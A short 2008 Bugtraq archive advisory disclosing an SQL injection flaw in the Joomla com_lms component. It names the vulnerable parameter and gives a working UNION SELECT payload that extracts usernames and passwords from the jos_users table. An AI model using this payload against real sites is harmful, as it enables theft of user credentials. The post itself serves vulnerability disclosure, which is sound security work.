Bugtraq mailing list archives
Joomla Component com_lms SQL Injection
From: no-reply () aria-security net
Date: 3 Apr 2008 01:00:10 -0000
Aria-Security Team (Persian Security Network) http://aria-security.net ---------------------------------- Joomla Component com_lms SQL Injection Greetz: AurA, Mormoroth, Null, t3rr0r1st Discovered by The-0utl4w Vendor: joomlashowroom.com/ Original Advisory: http://forum.aria-security.com/showthread.php?p=61 Vuln: index.phpoption=com_lms&task=showTests&cat=somenumber Example: -1 union select 1,concat(username,char(32),password),3,4,5,6,7 from jos_users/*
Current thread:
- Joomla Component com_lms SQL Injection no-reply (Apr 03)